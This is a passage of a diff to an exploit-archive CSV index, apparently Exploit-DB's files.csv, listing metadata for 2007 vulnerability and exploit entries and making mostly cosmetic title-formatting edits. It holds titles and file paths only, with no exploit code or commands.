4130,platforms/php/webapps/4130.txt,"TotalCalendar <= 2.402 (view_event.php) Remote SQL Injection Vulns",2007-06-30,t0pP8uZz,php,webapps,0 4131,platforms/php/webapps/4131.txt,"XCMS 1.1 (Galerie.php) Local File Inclusion Vulnerabilities",2007-06-30,BlackNDoor,php,webapps,0 -4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 Multiple Remote File Inclusion Vulnerabilities",2007-06-30,"Mehmet Ince",php,webapps,0 +4132,platforms/php/webapps/4132.txt,"sPHPell 1.01 - Multiple Remote File Inclusion Vulnerabilities",2007-06-30,"Mehmet Ince",php,webapps,0 4133,platforms/php/webapps/4133.txt,"ArcadeBuilder Game Portal Manager 1.7 - Remote SQL Injection Vuln",2007-07-01,t0pP8uZz,php,webapps,0 4134,platforms/php/webapps/4134.txt,"Easybe 1-2-3 Music Store (process.php) Remote SQL Injection Vuln",2007-07-01,t0pP8uZz,php,webapps,0 4135,platforms/php/webapps/4135.pl,"phpEventCalendar <= 0.2.3 (eventdisplay.php) SQL Injection Exploit",2007-07-01,Iron,php,webapps,0 @@ -3788,19 +3788,19 @@ id,file,description,date,author,platform,type,port 4140,platforms/php/webapps/4140.txt,"vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerability",2007-07-02,"Cold Zero",php,webapps,0 4141,platforms/php/webapps/4141.txt,"SuperCali PHP Event Calendar 0.4.0 - SQL Injection Vulnerability",2007-07-03,t0pP8uZz,php,webapps,0 4142,platforms/php/webapps/4142.txt,"Girlserv ads <= 1.5 (details_news.php) SQL Injection Vulnerability",2007-07-03,"Cold Zero",php,webapps,0 -4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - BoF Exploit",2007-07-03,shinnai,windows,remote,0 +4143,platforms/windows/remote/4143.html,"AXIS Camera Control (AxisCamControl.ocx 1.0.2.15) - BoF Exploit",2007-07-03,shinnai,windows,remote,0 4144,platforms/php/webapps/4144.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit (2 method)",2007-07-03,BlackHawk,php,webapps,0 4145,platforms/php/webapps/4145.php,"MyCMS <= 0.9.8 - Remote Command Execution Exploit",2007-07-03,BlackHawk,php,webapps,0 -4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 - 9.2sp1 Remote Buffer Overflow Exploit",2007-07-03,Heretic2,windows,remote,5151 +4146,platforms/windows/remote/4146.cpp,"ESRI ArcSDE 9.0 - 9.2sp1 - Remote Buffer Overflow Exploit",2007-07-03,Heretic2,windows,remote,5151 4147,platforms/php/webapps/4147.php,"PNphpBB2 <= 1.2i - viewforum.php Remote SQL Injection Exploit",2007-07-03,Coloss,php,webapps,0 4148,platforms/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4149,platforms/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow PoC",2007-07-05,"Mark Litchfield",windows,dos,0 4150,platforms/php/webapps/4150.txt,"VRNews 1.1.1 (admin.php) Remote Permission Bypass Vulnerability",2007-07-05,R4M!,php,webapps,0 4151,platforms/php/webapps/4151.sh,"AsteriDex <= 3.0 - Remote (callboth.php) Remote Code Execution Exploit",2007-07-05,"Carl Livitt",php,webapps,0 -4152,platforms/windows/remote/4152.py,"ViRC 2.0 (JOIN Response) Remote SEH Overwrite Exploit 0day",2007-07-06,h07,windows,remote,0 +4152,platforms/windows/remote/4152.py,"ViRC 2.0 - (JOIN Response) Remote SEH Overwrite Exploit (0day)",2007-07-06,h07,windows,remote,0 4153,platforms/php/webapps/4153.txt,"phpVID 0.9.9 (categories_type.php cat) SQL Injection Vulnerability",2007-07-06,t0pP8uZz,php,webapps,0 4154,platforms/php/webapps/4154.txt,"eMeeting Online Dating Software 5.2 - SQL Injection Vulnerabilities",2007-07-06,t0pP8uZz,php,webapps,0 -4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 +4155,platforms/windows/remote/4155.html,"HP Digital Imaging (hpqvwocx.dll 2.1.0.556) - SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion Vulnerability",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 @@ -3839,7 +3839,7 @@ id,file,description,date,author,platform,type,port 4191,platforms/php/webapps/4191.txt,"Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility",2007-07-18,t0pP8uZz,php,webapps,0 4192,platforms/php/webapps/4192.htm,"Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability",2007-07-18,meoconx,php,webapps,0 -4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 Remote File Upload Vulnerability",2007-07-18,"Cold Zero",php,webapps,0 +4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 - Remote File Upload Vulnerability",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability",2007-07-18,mozi,php,webapps,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 (link_main.php) RFI Vulnerability",2007-07-18,bd0rk,php,webapps,0 @@ -3850,7 +3850,7 @@ id,file,description,date,author,platform,type,port 4203,platforms/multiple/local/4203.sql,"Oracle 9i/10g Evil Views - Change Passwords Exploit",2007-07-19,bunker,multiple,local,0 4204,platforms/windows/local/4204.php,"PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit",2007-07-20,shinnai,windows,local,0 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit",2007-07-20,"YAG KOHHA",windows,dos,0 -4206,platforms/php/webapps/4206.txt,"Blog System 1.x (index.php news_id) Remote SQL Injection Vulnerability",2007-07-20,t0pP8uZz,php,webapps,0 +4206,platforms/php/webapps/4206.txt,"Blog System 1.x - (index.php news_id) Remote SQL Injection Vulnerability",2007-07-20,t0pP8uZz,php,webapps,0 4207,platforms/windows/remote/4207.py,"Lotus Domino IMAP4 Server 6.5.4 - Remote Buffer Overflow Exploit",2007-07-20,"dmc and prdelka",windows,remote,143 4208,platforms/windows/remote/4208.html,"Data Dynamics ActiveReport ActiveX (actrpt2.dll <= 2.5) Inscure Method",2007-07-21,shinnai,windows,remote,0 4209,platforms/php/webapps/4209.txt,"WSN Links Basic Edition (displaycat catid) SQL Injection Vulnerbility",2007-07-21,t0pP8uZz,php,webapps,0 @@ -3861,7 +3861,7 @@ id,file,description,date,author,platform,type,port 4214,platforms/windows/remote/4214.html,"Zenturi NixonMyPrograms Class (sasatl.dll 1.5.0.531) - Remote BoF",2007-07-23,shinnai,windows,remote,0 4215,platforms/windows/dos/4215.pl,"Microsoft Windows - Explorer.exe Gif Image Denial of Service Exploit",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0 -4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 +4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro <= 3.3.1 - (saveserver.php) Remote File Inclusion Vulnerability",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 @@ -3895,14 +3895,14 @@ id,file,description,date,author,platform,type,port 4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0 4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0 -4251,platforms/windows/dos/4251.html,"MS Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0 +4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0 4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo (.mpr replay file) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0 4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0 4254,platforms/php/webapps/4254.txt,"AuraCMS [Forum Module] Remote SQL Injection Vulnerability",2007-08-05,k1tk4t,php,webapps,0 4255,platforms/windows/remote/4255.html,"CHILKAT ASP String (CkString.dll <= 1.1) SaveToFile() Inscure Method",2007-08-05,shinnai,windows,remote,0 4256,platforms/php/webapps/4256.pl,"Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit",2007-08-05,k1tk4t,php,webapps,0 4257,platforms/windows/local/4257.c,"Panda Antivirus 2008 Local Privilege Escalation Exploit",2007-08-05,tarkus,windows,local,0 -4258,platforms/php/webapps/4258.txt,"la-nai cms 1.2.14 Multiple Remote SQL Injection Vulnerabilities",2007-08-06,k1tk4t,php,webapps,0 +4258,platforms/php/webapps/4258.txt,"la-nai cms 1.2.14 - Multiple Remote SQL Injection Vulnerabilities",2007-08-06,k1tk4t,php,webapps,0 4259,platforms/windows/remote/4259.txt,"Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit",2007-08-06,DeltahackingTEAM,windows,remote,0 4260,platforms/multiple/dos/4260.php,"PHP mSQL (msql_connect) Local Buffer Overflow PoC",2007-08-06,NetJackal,multiple,dos,0 4261,platforms/cgi/webapps/4261.txt,"YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure",2007-08-06,GoLd_M,cgi,webapps,0 @@ -3932,15 +3932,15 @@ id,file,description,date,author,platform,type,port 4285,platforms/windows/dos/4285.c,"CounterPath X-Lite 3.x SIP phone Remote Denial of Service Exploit",2007-08-13,ZwelL,windows,dos,0 4286,platforms/cgi/webapps/4286.txt,"IBM Rational ClearQuest Web Login Bypass SQL Injection Vulnerability",2007-08-14,s4squatch,cgi,webapps,0 4287,platforms/windows/remote/4287.py,"SurgeMail 38k (SEARCH) Remote Buffer Overflow Exploit",2007-08-14,"Joey Mengele",windows,remote,143 -4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 MMS Remote Denial of Service Exploit",2007-08-14,ZwelL,windows,dos,0 +4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 Mms Remote Denial of Service Exploit",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 - Remote Denial of Service Exploit",2007-08-14,NetJackal,windows,dos,0 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability",2007-08-16,RoXur777,php,webapps,0 -4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 +4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 -4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x (cart.php) Remote File Inclusion Vulnerability",2007-08-19,ShaiMagal,php,webapps,0 -4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability",2007-08-20,k1tk4t,php,webapps,0 +4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x - (cart.php) Remote File Inclusion Vulnerability",2007-08-19,ShaiMagal,php,webapps,0 +4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - Remote SQL Injection Vulnerability",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit",2007-08-21,rgod,windows,remote,0 @@ -3968,9 +3968,9 @@ id,file,description,date,author,platform,type,port 4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow Exploit (0day)",2007-08-27,bannedit,linux,remote,0 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 (nvUnifiedControl.dll 1.1.45.0) - SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - SaveXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 -4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - DeleteXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 +4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 (nvUtility.dll 1.0.14.0) - DeleteXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit",2007-08-27,Inphex,windows,local,0 -4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 +4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 - Remote SQL Injection / RFI Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) Remote SQL Injection Vulnerability",2007-08-27,D4m14n,php,webapps,0 4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability",2007-08-28,"not sec group",php,webapps,0 @@ -3994,7 +3994,7 @@ id,file,description,date,author,platform,type,port 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 4348,platforms/windows/remote/4348.c,"PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 -4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 +4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 4352,platforms/php/webapps/4352.txt,"Weblogicnet (files_dir) Multiple Remote File Inclusion Vulnerabilities",2007-09-02,bius,php,webapps,0 4353,platforms/php/webapps/4353.txt,"Yvora CMS 1.0 (error_view.php ID) Remote SQL Injection Vulnerability",2007-09-02,k1tk4t,php,webapps,0 @@ -4013,7 +4013,7 @@ id,file,description,date,author,platform,type,port 4366,platforms/windows/remote/4366.html,"GlobalLink 2.7.0.8 glItemCom.dll SetInfo() Heap Overflow Exploit",2007-09-05,void,windows,remote,0 4367,platforms/windows/remote/4367.c,"Trend Micro ServerProtect eng50.dll - Remote Stack Overflow Exploit",2007-09-06,devcode,windows,remote,0 4368,platforms/php/webapps/4368.txt,"phpMytourney (menu.php) Remote File Inclusion Vulnerability",2007-09-06,S.W.A.T.,php,webapps,0 -4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC",2007-09-06,shinnai,windows,dos,0 +4369,platforms/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC",2007-09-06,shinnai,windows,dos,0 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability",2007-09-07,k1tk4t,php,webapps,0 4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln",2007-09-07,k1tk4t,php,webapps,0 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 @@ -4029,7 +4029,7 @@ id,file,description,date,author,platform,type,port 4382,platforms/php/webapps/4382.txt,"phpress 0.2.0 (adisplay.php lang) Local File Inclusion Vulnerability",2007-09-08,"Nice Name Crew",php,webapps,0 4383,platforms/php/webapps/4383.txt,"Joomla Component Restaurante Remote File Upload Vulnerability",2007-09-08,"Cold Zero",php,webapps,0 4384,platforms/php/webapps/4384.txt,"WebED 0.8999a Multiple Remote File Inclusion Vulnerabilities",2007-09-08,MhZ91,php,webapps,0 -4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc Multiple Remote SQL Injection Vulnerabilities",2007-09-09,k1tk4t,php,webapps,0 +4385,platforms/php/webapps/4385.txt,"AuraCMS 1.5rc - Multiple Remote SQL Injection Vulnerabilities",2007-09-09,k1tk4t,php,webapps,0 4386,platforms/php/webapps/4386.txt,"Sisfo Kampus 2006 (dwoprn.php f) Remote File Download Vulnerability",2007-09-10,k-one,php,webapps,0 4387,platforms/php/webapps/4387.txt,"phpRealty 0.02 (MGR) Multiple Remote File Inclusion Vulnerabilities",2007-09-10,QTRinux,php,webapps,0 4388,platforms/windows/remote/4388.html,"Ultra Crypto Component (CryptoX.dll <= 2.0) SaveToFile() Inscure Method",2007-09-10,shinnai,windows,remote,0 @@ -4046,7 +4046,7 @@ id,file,description,date,author,platform,type,port 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability",2007-09-13,Houssamix,php,webapps,0 4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion Vulnerability",2007-09-13,Morgan,php,webapps,0 -4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 Remote Denial of Service Exploit",2007-09-13,vCore,windows,dos,0 +4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service Exploit",2007-09-13,vCore,windows,dos,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability",2007-09-13,"Sumit Siddharth",php,webapps,0 4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities",2007-09-14,Dj7xpl,php,webapps,0 @@ -4099,7 +4099,7 @@ id,file,description,date,author,platform,type,port 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 -4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 +4456,platforms/php/webapps/4456.txt,"FrontAccounting 1.13 - Remote File Inclusion Vulnerabilities",2007-09-26,kezzap66345,php,webapps,0 4457,platforms/php/webapps/4457.txt,"Softbiz Classifieds PLUS (id) Remote SQL Injection Vulnerability",2007-09-26,IRCRASH,php,webapps,0 4458,platforms/asp/webapps/4458.txt,"Novus 1.0 (notas.asp nota_id) Remote SQL Injection Vulnerability",2007-09-26,ka0x,asp,webapps,0 4459,platforms/php/webapps/4459.txt,"ActiveKB Knowledgebase 2.? (catId) Remote SQL Injection Vulnerability",2007-09-26,Luna-Tic/XTErner,php,webapps,0 @@ -4110,7 +4110,7 @@ id,file,description,date,author,platform,type,port 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 (SRC_PATH) Remote File Inclusion Vulnerability",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager <= 1.3 - Remote File Inclusion Vulnerability",2007-09-28,0in,php,webapps,0 4466,platforms/php/webapps/4466.php,"Zomplog <= 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 -4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 Remote SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 +4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - Remote SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads <= 1.5 - Remote SQL Injection Vulnerability",2007-09-29,Sniper456,php,webapps,0 4470,platforms/php/webapps/4470.txt,"mxBB Module mx_glance 2.3.3 - Remote File Include Vulnerability",2007-09-29,bd0rk,php,webapps,0 @@ -4133,7 +4133,7 @@ id,file,description,date,author,platform,type,port 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 - Remote Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 - Remote Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 4489,platforms/php/webapps/4489.txt,"joomla panoramic component 1.0 - Remote File Inclusion Vulnerability",2007-10-06,NoGe,php,webapps,0 -4490,platforms/php/webapps/4490.txt,"else if cms 0.6 - Multiple Vulnerabilities / exploit",2007-10-06,"HACKERS PAL",php,webapps,0 +4490,platforms/php/webapps/4490.txt,"else if cms 0.6 - Multiple Vulnerabilities / Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion (securite.php) Remote File Inclusion Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 4492,platforms/php/webapps/4492.txt,"Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 - Remote File Disclosure Vulnerability",2007-10-06,SnIpEr_SA,php,webapps,0 @@ -4143,7 +4143,7 @@ id,file,description,date,author,platform,type,port 4497,platforms/php/webapps/4497.txt,"joomla component wmtportfolio 1.0 - Remote File Inclusion Vulnerability",2007-10-07,NoGe,php,webapps,0 4498,platforms/windows/dos/4498.pl,"wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit",2007-10-07,k1tk4t,windows,dos,0 4499,platforms/php/webapps/4499.txt,"joomla component mosmedialite451 - Remote File Inclusion Vulnerability",2007-10-08,k1n9k0ng,php,webapps,0 -4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 +4500,platforms/php/webapps/4500.txt,"torrenttrader classic 1.07 - Multiple Vulnerabilities",2007-10-08,"HACKERS PAL",php,webapps,0 4501,platforms/php/webapps/4501.php,"PHP Homepage M 1.0 galerie.php Remote SQL Injection Exploit",2007-10-08,"[PHCN] Mahjong",php,webapps,0 4502,platforms/php/webapps/4502.txt,"xKiosk 3.0.1i (xkurl.php PEARPATH) Remote File Inclusion Vulnerability",2007-10-08,"BorN To K!LL",php,webapps,0 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability",2007-10-08,S.W.A.T.,php,webapps,0 @@ -4183,18 +4183,18 @@ id,file,description,date,author,platform,type,port 4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow Exploit",2005-05-03,greuff,linux,remote,0 4538,platforms/php/webapps/4538.txt,"Artmedic CMS <= 3.4 (index.php page) Local File Inclusion Vulnerability",2007-10-16,iNs,php,webapps,0 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - Remote SQL Injection Vulnerability",2007-10-16,dumenci,php,webapps,0 -4540,platforms/multiple/dos/4540.pl,"GCALDaemon <= 1.0-beta13 Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 +4540,platforms/multiple/dos/4540.pl,"GCALDaemon <= 1.0-beta13 - Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 4541,platforms/linux/remote/4541.c,"Half-Life Server 3.1.1.0 - Remote Buffer Overflow Exploit",2005-10-16,greuff,linux,remote,27015 4542,platforms/linux/remote/4542.py,"Boa 0.93.15 HTTP Basic Authentication Bypass Exploit",2007-10-16,ikki,linux,remote,0 4543,platforms/php/webapps/4543.txt,"PHPDJ 0.5 (djpage.php page) Remote File Inclusion Vulnerability",2007-10-17,GoLd_M,php,webapps,0 4544,platforms/php/webapps/4544.txt,"LimeSurvey <= 1.52 (language.php) Remote File Inclusion Vulnerability",2007-10-17,S.W.A.T.,php,webapps,0 -4545,platforms/php/webapps/4545.txt,"awzMB <= 4.2 beta 1 Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 +4545,platforms/php/webapps/4545.txt,"awzMB <= 4.2 beta 1 - Multiple Remote File Inclusion Vulnerabilities",2007-10-18,S.W.A.T.,php,webapps,0 4546,platforms/php/webapps/4546.txt,"ZZ FlashChat <= 3.1 - (help.php) Local File Inclusion Vulnerability",2007-10-19,d3hydr8,php,webapps,0 4547,platforms/php/webapps/4547.pl,"Simple Machines Forum 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,"Michael Brooks",php,webapps,0 4548,platforms/php/webapps/4548.php,"Vanilla <= 1.1.3 - Remote Blind SQL Injection Exploit",2007-10-20,InATeam,php,webapps,0 -4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 +4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0 -4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 +4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0 4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0 4553,platforms/windows/local/4553.php,"PHP 5.x COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0 4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0 @@ -4204,13 +4204,13 @@ id,file,description,date,author,platform,type,port 4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion Vulnerability",2007-10-22,"BorN To K!LL",php,webapps,0 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox <= 2.0.0.7 - Remote Denial of Service 